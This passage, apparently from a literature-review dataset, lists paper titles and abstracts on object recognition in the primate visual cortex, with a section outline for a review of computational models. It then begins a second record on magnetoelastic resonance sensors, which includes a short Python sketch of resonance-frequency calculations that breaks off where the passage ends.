After the subjects reached 90% correct performance on a fixed canonical view of each object, discrimination performance was tested for novel views that differed by up to 60 ° from the training view. In experiment 1 (in which the distribution of parameters in each class was unimodal) and in experiment 2 (bimodal classes), the stimuli differed only parametrically and consisted of the same geons (parts), yet were recognized virtually independently of viewpoint in the low-similarity condition. In experiment 3, the prototypes differed in their arrangement of geons, yet the subjects' performance depended significantly on viewpoint in the high-similarity condition. In all three experiments, higher interstimulus similarity was associated with an increase in the mean error rate and, for misorientation of up to 45 °, with an increase in the degree of viewpoint dependence. These results suggest that a geon-level difference between stimuli is neither strictly necessary nor always sufficient for viewpoint-invariant performance. Thus, basic and subordinate-level processes in visual recognition may be more closely related than previously thought. --- paper_title: Representation And Recognition In Vision paper_content: Researchers have long sought to understand what the brain does when we see an object, what two people have in common when they see the same object, and what a "seeing" machine would need to have in common with a human visual system. Recent neurobiological and computational advances in the study of vision have now brought us close to answering these and other questions about representation. In Representation and Recognition in Vision, Shimon Edelman bases a comprehensive approach to visual representation on the notion of correspondence between proximal (internal) and distal similarities in objects. This leads to a computationally feasible and formally veridical representation of distal objects that addresses the needs of shape categorization and can be used to derive models of perceived similarity. Edelman first discusses the representational needs of various visual recognition tasks, and surveys current theories of representation in this context. He then develops a theory of representation that is related to Shepard's notion of second-order isomorphism between representations and their targets. Edelman goes beyond Shepard by specifying the conditions under which the representations can be made formally veridical. Edelman assesses his theory's performance in identification and categorization of 3D shapes and examines it in light of psychological and neurobiological data concerning the object-processing stream in primate vision. He also discusses the connections between his theory and other efforts to understand representation in the brain. --- paper_title: Rotating objects to recognize them: A case study on the role of viewpoint dependency in the recognition of three-dimensional objects. paper_content: Successful object recognition is essential for finding food, identifying kin, and avoiding danger, as well as many other adaptive behaviors. To accomplish this feat, the visual system must reconstruct 3-D interpretations from 2-D “snapshots” falling on the retina. Theories of recognition address this process by focusing on the question of how object representations are encoded with respect to viewpoint. 
Although empirical evidence has been equivocal on this question, a growing body of surprising results, including those obtained in the experiments presented in this case study, indicates that recognition is often viewpoint dependent. Such findings reveal a prominent role for viewpoint-dependent mechanisms and provide support for the multiple-views approach, in which objects are encoded as a set of view-specific representations that are matched to percepts using normalization procedures. --- paper_title: Optical imaging of functional organization in the monkey inferotemporal cortex. paper_content: To investigate the functional organization of object recognition, the technique of optical imaging was applied to the primate inferotemporal cortex, which is thought to be essential for object recognition. The features critical for the activation of single cells were first determined in unit recordings with electrodes. In the subsequent optical imaging, presentation of the critical features activated patchy regions around 0.5 millimeters in diameter, covering the site of the electrode penetration at which the critical feature had been determined. Because signals in optical imaging reflect average neuronal activities in the regions, the result directly indicates the regional clustering of cells responding to similar features. --- paper_title: Generalization to Novel Images in Upright and Inverted Faces paper_content: An image of a face depends not only on its shape, but also on the viewing position, illumination conditions, and facial expression. Any face recognition system must overcome the changes in face appearance induced by these factors. To assess the ability of human vision to generalize across changes in illumination and pose of faces, we studied the performance of subjects in a discrimination task with either upright or inverted faces. Subjects first learned to discriminate among images of three faces, taken under fixed viewing position and illumination. They were then tested on images of the same faces taken under all combinations of four illuminations and five viewing positions. For upright faces, we found remarkably good generalization to novel conditions. For inverted faces, the generalization to novel views was significantly worse, although the performance on the training images was similar in both cases. --- paper_title: Psychophysical support for a two-dimensional view interpolation theory of object recognition. paper_content: Does the human brain represent objects for recognition by storing a series of two-dimensional snapshots, or are the object models, in some sense, three-dimensional analogs of the objects they represent? One way to address this question is to explore the ability of the human visual system to generalize recognition from familiar to unfamiliar views of three-dimensional objects. Three recently proposed theories of object recognition--viewpoint normalization or alignment of three-dimensional models [Ullman, S. (1989) Cognition 32, 193-254], linear combination of two-dimensional views [Ullman, S. & Basri, R. (1990) Recognition by Linear Combinations of Models (Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge), A. I. Memo No. 1152], and view approximation [Poggio, T. & Edelman, S. (1990) Nature (London) 343, 263-266]--predict different patterns of generalization to unfamiliar views. 
We have exploited the conflicting predictions to test the three theories directly in a psychophysical experiment involving computer-generated three-dimensional objects. Our results suggest that the human visual system is better described as recognizing these objects by two-dimensional view interpolation than by alignment or other methods that rely on object-centered three-dimensional models. --- paper_title: Shape representation in the inferior temporal cortex of monkeys paper_content: Background: The inferior temporal cortex (IT) of the monkey has long been known to play an essential role in visual object recognition. Damage to this area results in severe deficits in perceptual learning and object recognition, without significantly affecting basic visual capacities. Consistent with these ablation studies is the discovery of IT neurons that respond to complex two-dimensional visual patterns, or objects such as faces or body parts. What is the role of these neurons in object recognition? Is such a complex configurational selectivity specific to biologically meaningful objects, or does it develop as a result of extensive exposure to any objects whose identification relies on subtle shape differences? If so, would IT neurons respond selectively to recently learned views or features of novel objects? The present study addresses this question by using combined psychophysical and electrophysiological experiments, in which monkeys learned to classify and recognize computer-generated three-dimensional objects. Results: A population of IT neurons was found that responded selectively to views of previously unfamiliar objects. The cells discharged maximally to one view of an object, and their response declined gradually as the object was rotated away from this preferred view. No selective responses were ever encountered for views that the animal systematically failed to recognize. Most neurons also exhibited orientation-dependent responses during view-plane rotations. Some neurons were found to be tuned around two views of the same object, and a very small number of cells responded in a view-invariant manner. For the five different objects that were used extensively during the training of the animals, and for which behavioral performance became view-independent, multiple cells were found that were tuned around different views of the same object. A number of view-selective units showed response invariance for changes in the size of the object or the position of its image within the parafovea. Conclusion: Our results suggest that IT neurons can develop a complex receptive field organization as a consequence of extensive training in the discrimination and recognition of objects. None of these objects had any prior meaning for the animal, nor did they resemble anything familiar in the monkey's environment. Simple geometric features did not appear to account for the neurons' selective responses. These findings support the idea that a population of neurons - each tuned to a different object aspect, and each showing a certain degree of invariance to image transformations - may, as an ensemble, encode at least some types of complex threedimensional objects. In such a system, several neurons may be active for any given vantage point, with a single unit acting like a blurred template for a limited neighborhood of a single view. --- paper_title: Sparse population coding of faces in the inferotemporal cortex. paper_content: How does the brain represent objects in the world? 
A proportion of cells in the temporal cortex of monkeys responds specifically to objects, such as faces, but the type of coding used by these cells is not known. Population analysis of two sets of such cells showed that information is carried at the level of the population and that this information relates, in the anterior inferotemporal cortex, to the physical properties of face stimuli and, in the superior temporal polysensory area, to other aspects of the faces, such as their familiarity. There was often sufficient information in small populations of neurons to identify particular faces. These results suggest that representations of complex stimuli in the higher visual areas may take the form of a sparse population code. --- paper_title: Responses of Neurons in Inferior Temporal Cortex During MemoryGuided Visual Search paper_content: Chelazzi, Leonardo, John Duncan, Earl K. Miller, and Robert Desimone. Responses of neurons in inferior temporal cortex during memory-guided visual search. J. Neurophysiol. 80: 2918–2940, 1998. A typical scene will contain many different objects, few of which are relevant to behavior at any given moment. Thus attentional mechanisms are needed to select relevant objects for visual processing and control over behavior. We examined this role of attention in the inferior temporal cortex of macaque monkeys, using a visual search paradigm. While the monkey maintained fixation, a cue stimulus was presented at the center of gaze, followed by a blank delay period. After the delay, an array of two to five choice stimuli was presented extrafoveally, and the monkey was rewarded for detecting a target stimulus matching the cue. The behavioral response was a saccadic eye movement to the target in one version of the task and a lever release in another. The array was composed of one “good” stimulus (effective in driving the cell when presented alone) and one or more “poor” stimuli (ineffective in driving the cell when presented alone). Most cells showed higher delay activity after a good stimulus used as the cue than after a poor stimulus. The baseline activity of cells was also higher preceding a good cue, if the animal expected it to occur. This activity may depend on a top-down bias in favor of cells coding the relevant stimulus. When the choice array was presented, most cells showed suppressive interactions between the stimuli as well as strong attention effects. When the choice array was presented in the contralateral visual field, most cells initially responded the same, regardless of which stimulus was the target. However, within 150–200 ms of array onset, responses were determined by the target stimulus. If the target was the good stimulus, the response to the array became equal to the response to the good stimulus presented alone. If the target was a poor stimulus, the response approached the response to that stimulus presented alone. Thus the influence of the nontarget stimulus was eliminated. These effects occurred well in advance of the behavioral response. When the array was positioned with stimuli on opposite sides of the vertical meridian, the contralateral stimulus appeared to dominate the response, and this dominant effect could not be overcome by attention. 
Overall, the results support a “biased competition” model of attention, according to which 1 ) objects in the visual field compete for representation in the cortex, and 2 ) this competition is biased in favor of the behaviorally relevant object by virtue of “top-down” feedback from structures involved in working memory. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: Shifts in selective visual attention: towards the underlying neural circuitry paper_content: A number of psychophysical studies concerning the detection, localization and recognition of objects in the visual field have suggested a two-stage theory of human visual perception. The first stage is the “preattentive” mode, in which simple features are processed rapidly and in parallel over the entire visual field. In the second, “attentive” mode, a specialized processing focus, usually called the focus of attention, is directed to particular locations in the visual field. 
The analysis of complex forms and the recognition of objects are associated with this second stage.1 The computational justification for such a hypothesis comes from the realization that while it is possible to imagine specific algorithms performing tasks such as shape analysis and recognition at specific locations, it is difficult to imagine these algorithms operating in parallel over the whole visual scene, since such an approach will quickly lead to a combinatorial explosion in terms of required computational resources.2 This is essentially the major critique of Minsky and Papert to a universal application of perceptrons in visual perception.3 Taken together, these empirical and theoretical studies suggest that beyond a certain preprocessing stage, the analysis of visual information proceeds in a sequence of operations, each one applied to a selected location (or locations). --- paper_title: Neural Mechanisms of Visual Working Memory in Prefrontal Cortex of the Macaque paper_content: Prefrontal (PF) cells were studied in monkeys performing a delayed matching to sample task, which requires working memory. The stimuli were complex visual patterns and to solve the task, the monkeys had to discriminate among the stimuli, maintain a memory of the sample stimulus during the delay periods, and evaluate whether a test stimulus matched the sample presented earlier in the trial. PF cells have properties consistent with a role in all three of these operations. Approximately 25% of the cells responded selectively to different visual stimuli. Half of the cells showed heightened activity during the delay after the sample and, for many of these cells, the magnitude of delay activity was selective for different samples. Finally, more than half of the cells responded differently to the test stimuli depending on whether they matched the sample. Because inferior temporal (IT) cortex also is important for working memory, we compared PF cells with IT cells studied in the same task. Compared with IT cortex, PF responses were less often stimulus-selective but conveyed more information about whether a given test stimulus was a match to the sample. Furthermore, sample-selective delay activity in PF cortex was maintained throughout the trial even when other test stimuli intervened during the delay, whereas delay activity in IT cortex was disrupted by intervening stimuli. The results suggest that PF cortex plays a primary role in working memory tasks and may be a source of feedback inputs to IT cortex, biasing activity in favor of behaviorally relevant stimuli. --- paper_title: Modeling Perceptual Grouping and Figure-Ground Segregation by Means of Active Reentrant Connections paper_content: Abstract ::: The segmentation of visual scenes is a fundamental process of early vision, but the underlying neural mechanisms are still largely unknown. Theoretical considerations as well as neurophysiological findings point to the importance in such processes of temporal correlations in neuronal activity. In a previous model, we showed that reentrant signaling among rhythmically active neuronal groups can correlate responses along spatially extended contours. We now have modified and extended this model to address the problems of perceptual grouping and figure-ground segregation in vision. A novel feature is that the efficacy of the connections is allowed to change on a fast time scale. This results in active reentrant connections that amplify the correlations among neuronal groups. 
The responses of the model are able to link the elements corresponding to a coherent figure and to segregate them from the background or from another figure in a way that is consistent with the so-called Gestalt laws. --- paper_title: Neural correlates of feature selective memory and pop-out in extrastriate area V4 paper_content: Neural activity in area V4 was examined to assess (1) whether the effects of attentive selection for stimulus features could be based on the memory of the feature, (2) whether dynamically changing the feature selection would cause activity associated with the newly selected stimuli to pop out, and (3) whether intrusion of more than one stimulus into the receptive field would disrupt the feature-selective activity. Rhesus monkeys were trained on several variations of a conditional orientation discrimination task. A differential activation of area V4 neurons was observed in the conditional discrimination task based on the presence of a match or a nonmatch between the conditional cue (a particular color or luminance) and the color or luminance of the receptive field stimulus. The differential activation was unchanged when the cue was removed and the animal had to remember its color (or luminance) to perform the task. When the cued feature was switched from one alternative to another in the middle of a trial the differential activation of neurons reversed over the course of 150–300 msec. If the stimulus in the receptive field contained the newly selected feature, V4 neurons became activated without a concomitant change in the stimulus in classical receptive field. Across the topographic map of V4 the activity associated with the newly selected stimuli popped out, whereas the activity of deselected stimuli faded to the background levels of other background objects. Evidence of a suppressive input from stimuli outside the classical receptive field was clear in only 3 of 24 neurons examined. Intrusion into the classical receptive field by a second stimulus resulted in a diminished difference between matching and nonmatching conditions. These physiological data suggest a major role for attentional control in the parallel processing of simple feature-selective differences. --- paper_title: The wake-sleep algorithm for unsupervised neural networks paper_content: An unsupervised learning algorithm for a multilayer network of stochastic neurons is described. Bottom-up "recognition" connections convert the input into representations in successive hidden layers, and top-down "generative" connections reconstruct the representation in one layer from the representation in the layer above. In the "wake" phase, neurons are driven by recognition connections, and generative connections are adapted to increase the probability that they would reconstruct the correct activity vector in the layer below. In the "sleep" phase, neurons are driven by generative connections, and recognition connections are adapted to increase the probability that they would produce the correct activity vector in the layer above. --- paper_title: State dependent activity in monkey visual cortex paper_content: Responses were recorded from isolated neurons in the visual cortex of rhesus monkeys while they performed an orientation match to sample task. In each trial the animal was first cued with randomly selected orientation, and then presented with a sequence of gratings whose orientations were randomly selected. The animal was required to release a switch when it saw a grating that matched the cued orientation. 
For some recordings the animal was given a tactile cue by having it feel the orientation of a grooved plate that it could not see. In other experiments the cue orientation was presented visually on the screen in front of the animal and then removed before the sequence of gratings was presented. Using this task it was possible to determine if a neuron's response to a particular orientation was affected by whether or not it was the orientation for which the animal was looking. Over half the neurons examined in V4 (110/192) responded differently to the visual stimuli when the animal was cued to look for different orientations. For some neurons responses to all stimuli were strong when the animal was cued to look for a particular orientation, but weak when the same stimuli were presented in trials where the animal had been cued to look for another orientation. This type of sensitivity was found in neurons recorded while the animal was given a tactile cue, and also in other neurons tested when a visual cue was used, suggesting that the activity was not of direct sensory origin. In support of this, neurons in V4 were not strongly affected when the animal felt the grooved plate while not performing the orientation matching task. The prevalence of behavioral effects that was found using the orientation matching task suggests that extraretinal signals represent a prominent component of the activity in V4 of the behaving monkey. --- paper_title: Emergence of Phase- and Shift-Invariant Features by Decomposition of Natural Images into Independent Feature Subspaces paper_content: Olshausen and Field (1996) applied the principle of independence maximization by sparse coding to extract features from natural images. This leads to the emergence of oriented linear filters that have simultaneous localization in space and in frequency, thus resembling Gabor functions and simple cell receptive fields. In this article, we show that the same principle of independence maximization can explain the emergence of phase- and shift-invariant features, similar to those found in complex cells. This new kind of emergence is obtained by maximizing the independence between norms of projections on linear subspaces (instead of the independence of simple linear filter outputs). The norms of the projections on such "independent feature subspaces" then indicate the values of invariant features. --- paper_title: Emergence of simple-cell receptive field properties by learning a sparse code for natural images paper_content: The receptive fields of simple cells in mammalian primary visual cortex can be characterized as being spatially localized, oriented [1-4] and bandpass (selective to structure at different spatial scales), comparable to the basis functions of wavelet transforms [5,6]. One approach to understanding such response properties of visual neurons has been to consider their relationship to the statistical structure of natural images in terms of efficient coding [7-12]. Along these lines, a number of studies have attempted to train unsupervised learning algorithms on natural images in the hope of developing receptive fields with similar properties [13-18], but none has succeeded in producing a full set that spans the image space and contains all three of the above properties. Here we investigate the proposal [8,12] that a coding strategy that maximizes sparseness is sufficient to account for these properties.
We show that a learning algorithm that attempts to find sparse linear codes for natural scenes will develop a complete family of localized, oriented, bandpass receptive fields, similar to those found in the primary visual cortex. The resulting sparse image code provides a more efficient representation for later stages of processing because it possesses a higher degree of statistical independence among its outputs. --- paper_title: Learning Invariance From Transformation Sequences paper_content: The visual system can reliably identify objects even when the retinal image is transformed considerably by commonly occurring changes in the environment. A local learning rule is proposed, which allows a network to learn to generalize across such transformations. During the learning phase, the network is exposed to temporal sequences of patterns undergoing the transformation. An application of the algorithm is presented in which the network learns invariance to shift in retinal position. Such a principle may be involved in the development of the characteristic shift invariance property of complex cells in the primary visual cortex, and also in the development of more complicated invariance properties of neurons in higher visual areas. --- paper_title: Object classification using a fragment-based representation paper_content: The tasks of visual object recognition and classification are natural and effortless for biological visual systems, but exceedingly difficult to replicate in computer vision systems. This difficulty arises from the large variability in images of different objects within a class, and variability in viewing conditions. In this paper we describe a fragment-based method for object classification. In this approach objects within a class are represented in terms of common image fragments, that are used as building blocks for representing a large variety of different objects that belong to a common class, such as a face or a car. Optimal fragments are selected from a training set of images based on a criterion of maximizing the mutual information of the fragments and the class they represent. For the purpose of classification the fragments are also organized into types, where each type is a collection of alternative fragments, such as different hairline or eye regions for face classification. During classification, the algorithm detects fragments of the different types, and then combines the evidence for the detected fragments to reach a final decision. The algorithm verifies the proper arrangement of the fragments and the consistency of the viewing conditions primarily by the conjunction of overlapping fragments. The method is different from previous part-based methods in using class-specific overlapping object fragments of varying complexity, and in verifying the consistent arrangement of the fragments primarily by the conjunction of overlapping detected fragments. Experimental results on the detection of face and car views show that the fragment-based approach can generalize well to completely novel image views within a class while maintaining low mis-classification error rates. We briefly discuss relationships between the proposed method and properties of parts of the primate visual system involved in object perception. --- paper_title: Categorical Perception: The Groundwork of Cognition paper_content: List of contributors Preface Introduction: psychophysical and cognitive aspects of categorical perception: a critical overview S. Harnad Part I. 
Psychophysical Foundations of Categorical Perception: 1. Categoric perception: some psychophysical models R. E. Pastore 2. Beyond the categorical/continuous distinction: a psychophysical approach to processing modes N. A. MacMillan Part II. Categorical Perception of Speech: 3. Phonetic category boundaries are flexible B. H. Repp and A. M. Liberman 4. Auditory, articulatory, and learning explanations of categorical perception in speech S. Rosen and P. Howell 5. On infant speech perception and the acquisition of language P. D. Eimas, J. L. Miller and P. W. Jusczyk Part III. Models for Speech Categorical Perception: 6. Neural models of speech perception: a case history R. E. Remez 7. On the categorization of speech sounds R. L. Diehl and K. R. Kluender 8. Categorical partition: a fuzzy-logical model of categorization behaviour D. W. Massaro Part IV. Categorical Perception in Other Modalities and Other Species: 9. Perceptual categories in vision and audition M. H. Bornstein 10. Categorical perception of sound signals: facts and hypotheses from animal studies G. Ehret 11. A naturalistic view of categorical perception C. T. Snowden 12. The special-mechanisms debate in speech research: categorization tests on animals and infants P. K. Kuhl 13. Brain mechanisms in categorical perception M. Wilson Part V. Psychophysiological Indices of Categorical Perception: 14. Electrophysiological indices of categorical perception for speech D. L. Molfese 15. Evoked potentials and color-defined categories D. Regan Part VI. Higher-order Categories: 16. Categorization processes and categorical perception D. L. Medin and L. W. Barsalou 17. Developmental changes in category structure F. C. Keil and M. H. Kelly 18. Spatial categories: the perception and conceptualization of spatial relations E. Bialystok and D. R. Olson Part VII. Cognitive Foundations: 19. Category induction and representation S. Harnad Author index Subject index. --- paper_title: Global and fine information coded by single neurons in the temporal visual cortex paper_content: When we see a person's face, we can easily recognize their species, individual identity and emotional state. How does the brain represent such complex information? A substantial number of neurons in the macaque temporal cortex respond to faces [1-12]. However, the neuronal mechanisms underlying the processing of complex information are not yet clear. Here we recorded the activity of single neurons in the temporal cortex of macaque monkeys while presenting visual stimuli consisting of geometric shapes, and monkey and human faces with various expressions. Information theory was used to investigate how well the neuronal responses could categorize the stimuli. We found that single neurons conveyed two different scales of facial information in their firing patterns, starting at different latencies. Global information, categorizing stimuli as monkey faces, human faces or shapes, was conveyed in the earliest part of the responses. Fine information about identity or expression was conveyed later, beginning on average 51 ms after global information. We speculate that global information could be used as a ‘header’ to prepare destination areas for receiving more detailed information. --- paper_title: Neurophysiology of shape processing paper_content: Recent physiological findings are reviewed and synthesized into a model of shape processing and object recognition. Gestalt laws (e.g. good continuation, closure) and ‘non-accidental’ image properties (e.g.
colinear terminating lines) are resolved in prestriate visual cortex (areas V2 and V3) to support the extraction of 2D shape boundaries. Processing of shape continues along a ventral route through inferior temporal (IT) cortex where a vast catalogue of 2D shape primitives is established. Each catalogue entry is size-specific (±0.5 log scale unit) and orientation-specific (±45°), but can generalize over position (±150 degree2). Several shape components are used to activate representations of the approximate appearance of one object type at one view, orientation and size. Subsequent generalization, first over orientation and size, then over view, and finally over object sub-component, is achieved in the anterior temporal cortex by combining descriptions of the same object from different orientations and views, through associative learning. This scheme provides a route to 3D object recognition through 2D shape description and reduces the problem of perceptual invariance to a series of independent analyses with an associative link established between the outputs. The system relies on parallel processing with computations performed in a series of hierarchical steps with relatively simple operations at each stage. --- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Generalization to Novel Images in Upright and Inverted Faces paper_content: An image of a face depends not only on its shape, but also on the viewing position, illumination conditions, and facial expression. Any face recognition system must overcome the changes in face appearance induced by these factors. To assess the ability of human vision to generalize across changes in illumination and pose of faces, we studied the performance of subjects in a discrimination task with either upright or inverted faces. Subjects first learned to discriminate among images of three faces, taken under fixed viewing position and illumination.
They were then tested on images of the same faces taken under all combinations of four illuminations and five viewing positions. For upright faces, we found remarkably good generalization to novel conditions. For inverted faces, the generalization to novel views was significantly worse, although the performance on the training images was similar in both cases. ---
Title: Computational Models of Object Recognition in Cortex: A Review Section 1: Object recognition is a difficult computational problem Description 1: Introduce the problem of object recognition, its complexities, and its significance in the context of intelligent machines and neuroscience. Section 2: Multiple tasks and strategies in object recognition Description 2: Discuss different levels of specificity in object recognition (identification vs. categorization) and compare perspectives from computer vision and neuroscience. Section 3: A continuum of recognition tasks along the trade-off between specificity and invariance Description 3: Explain the theoretical spectrum between identification and categorization, emphasizing the trade-off between specificity and invariance. Section 4: The same basic computational strategy can be used from identification to categorization Description 4: Describe how the same computational strategies can adapt to different recognition tasks, highlighting multiple strategies in biological vision. Section 5: Models and experiments Description 5: Emphasize the necessity of models in understanding recognition and planning new experiments with a focus on isolated objects and recent developments. Section 6: Models: Object-Centered and View-Based, Feedforward and Feedback Description 6: Review the major categories of models for object recognition, including object-centered vs. view-based models and feedforward vs. feedback models. Section 7: A basic module: feedforward and view-based Description 7: Examine the support for feedforward and view-based models from neurophysiological data and their relevance in immediate recognition of 3D objects. Section 8: Invariance and specificity Description 8: Analyze the central issue of the invariance-specificity trade-off and how different transformations affect recognition performance. Section 9: A basic module for identification and categorization: sparse population codes Description 9: Discuss the concept of sparse population codes in object recognition and how it supports identification and categorization. Section 10: A unified view Description 10: Consider the implementation of different recognition tasks using a unified architectural approach, including hierarchical categorization schemes. Section 11: Top-down and role of feedback Description 11: Explore the role of top-down processing in recognition, including learning phases, attention control, and model matching. Section 12: Learning Description 12: Describe the learning mechanisms across different cortical layers and the development of invariant features. Section 13: The time dimension Description 13: Address the importance of incorporating the temporal aspect of recognition, including object and eye movement dynamics. Section 14: Some key predictions Description 14: Detail critical predictions based on the reviewed models and the potential implications of their experimental validation or falsification.
Theory, Instrumentation and Applications of Magnetoelastic Resonance Sensors: A Review
21
--- paper_title: Wireless Magnetoelastic Resonance Sensors: A Critical Review paper_content: This paper presents a comprehensive review of magnetoelastic environmental sensor technology; topics include operating physics, sensor design, and illustrative applications. Magnetoelastic sensors are made of amorphous metallic glass ribbons or wires, with a characteristic resonant frequency inversely proportional to length. The remotely detected resonant frequency of a magnetoelastic sensor shifts in response to different physical parameters including stress, pressure, temperature, flow velocity, liquid viscosity, magnetic field, and mass loading. Coating the magnetoelastic sensor with a mass changing, chemically responsive layer enables realization of chemical sensors. Magnetoelastic sensors can be remotely interrogated by magnetic, acoustic, or optical means. The sensors can be characterized in the time domain, where the resonant frequency is determined through analysis of the sensor transient response, or in the frequency domain where the resonant frequency is determined from the frequency-amplitude spectrum of the sensor. --- paper_title: Characterization of nano-dimensional thin-film elastic moduli using magnetoelastic sensors paper_content: Abstract Application of magnetoelastic thick-film sensors to the measurement of thin-film elastic moduli is described in this study. An analytical model is derived, that relates the resonant frequency of a magnetoelastic sensor to the elasticity and density of an applied thin-film. Limits of the model are analyzed, and related to experimental measurements using thin-films of silver and aluminum. For 500 nm thick-films, the measured Young’s modulus of elasticity for Al and Ag is found to be within 1.6% of standard data. Using commercially available magnetoelastic sensors, the elasticity of coatings, approximately 30 nm thick, can readily be measured. --- paper_title: The frequency response of magnetoelastic sensors to stress and atmospheric pressure paper_content: Earlier work demonstrated that the characteristic resonant frequency of magnetoelastic thick-film sensors shifts linearly downwards in response to increasing atmospheric pressure. In this paper, the response mechanism is detailed and shown to be a function of both pressure and the way that the sensor is mechanically stressed. Stressing the sensor, in either the elastic or plastic regime, induces out-of-plane vibrations that act as a pressure-dependent damping force to the longitudinal sensor oscillations excited by the interrogation field. This damping force, in turn, acts to shift the resonant frequency of the magnetoelastic sensor lower in response to increasing pressure. --- paper_title: Magnetoelastic sensors in combination with nanometer-scale honeycombed thin film ceramic TiO2 for remote query measurement of humidity. paper_content: Ribbonlike magnetoelastic sensors can be considered the magnetic analog of an acoustic bell; in response to an externally applied magnetic field impulse the sensors emit magnetic flux with a characteristic resonant frequency. The magnetic flux can be detected external to the test area using a pick-up coil, enabling query remote monitoring of the sensor. The characteristic resonant frequency of a magnetoelastic sensor changes in response to mass loads. [L.D. Landau and E. M. Lifshitz, Theory of Elasticity, 3rd ed. (Pergamon, New York, 1986). p. 
100].Therefore, remote query chemical sensors can be fabricated by combining the magnetoelastic sensors with a mass changing, chemically responsive layer. In this work magnetoelastic sensors are coated with humidity-sensitive thin films of ceramic, nanodimensionally porous TiO2 to make remote query humidity sensors. --- paper_title: Monitoring blood coagulation with magnetoelastic sensors. paper_content: The determination of blood coagulation time is an essential part of monitoring therapeutic anticoagulants. Standard methodologies for the measurement of blood clotting time require dedicated personnel and involve blood sampling procedures. A new method based on magnetoelastic sensors has been employed for the monitoring of blood coagulation. The ribbon-like magnetoelastic sensor oscillates at a fundamental frequency, which shifts linearly in response to applied mass loads or a fixed mass load of changing elasticity. The magnetoelastic sensors emit magnetic flux, which can be detected by a remotely located pick-up coil, so that no direct physical connections are required. During blood coagulation, the viscosity of blood changes due to the formation of a soft fibrin clot. In turn, this change in viscosity shifts the characteristic resonance frequency of the magnetoelastic sensor enabling real-time continuous monitoring of this biological event. By monitoring the signal output as a function of time, a distinct blood clotting profile can be seen. The relatively low cost of the magnetoelastic ribbons enables their use as disposable sensors. This, along with the reduced volume of blood required, make the magnetoelastic sensors well suited for at-home and point-of-care testing devices. --- paper_title: Remote query pressure measurement using magnetoelastic sensors paper_content: Two magnetostriction-based methods for measuring atmospheric pressure are presented. Each technique correlates changes in pressure with the characteristic resonant frequency of a magnetoelastic magnetostrictive thick-film sensor. In each case the sensor is monitored remotely, using an adjacently located pickup coil, without the use of physical connections to the sensor. --- paper_title: A remote query magnetoelastic pH sensor. paper_content: A remote query magnetoelastic pH sensor comprised of a magnetoelastic thick-film coated with a mass-changing pH-responsive polymer is described. In response to a magnetic query field the magnetoelastic sensor mechanically vibrates at a characteristic frequency that is inversely dependent upon the mass of the attached polymer layer. As the magnetoelastic sensor is magnetostrictive the mechanical vibrations of the sensor launch magnetic flux that can be detected remotely from the sensor using a pickup coil. The pH responsive copolymer is synthesized from 20 mol% of acrylic acid and 80 mol% of iso-octyl acrylate and then deposited onto a magnetoelastic film by dip-coating. For a 1 micrometer polymer coating upon a 30 micrometer thick Metglas [The Metglas alloys are a registered trademark of Honeywell Corporation. For product information see: http://www.electronicmaterials.com:80/businesses/sem/amorph/page5_1_2.htm.] alloy 2826MB magnetoelastic film between pH 5 and 9 the change in resonant frequency is linear, approximately 285 Hz/pH or 0.6%/pH. The addition of 10 mmol/l of KCl to the test solution decreases the sensitivity of the polymer approximately 4%. 
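The abstracts above repeatedly invoke two first-order relations: the fundamental longitudinal resonance frequency of a free-standing magnetoelastic ribbon, and the downward shift of that frequency produced by a small, rigidly coupled mass load. The Python sketch below illustrates these commonly quoted expressions; the ribbon dimensions and the Metglas 2826MB-like material constants used here are illustrative assumptions, not values taken from the cited papers.

```python
# Minimal sketch of the first-order relations commonly cited for ribbon-like
# magnetoelastic sensors: f0 = (1/2L) * sqrt(E / (rho * (1 - nu^2))) and, for a
# small uniform mass load dm on a sensor of mass m0, df ~= -f0 * dm / (2 * m0).
# All numerical values below are illustrative assumptions.
from math import sqrt

# Assumed Metglas 2826MB-like ribbon properties (illustrative only)
E = 105e9          # Young's modulus, Pa
rho = 7900.0       # density, kg/m^3
nu = 0.33          # Poisson's ratio
L = 6e-3           # sensor length, m
w, t = 2e-3, 28e-6 # width and thickness, m

m0 = rho * L * w * t                                       # unloaded sensor mass, kg
f0 = (1.0 / (2.0 * L)) * sqrt(E / (rho * (1.0 - nu**2)))   # fundamental resonance, Hz

# Frequency shift for a small, rigidly coupled mass load (e.g. an adsorbed layer)
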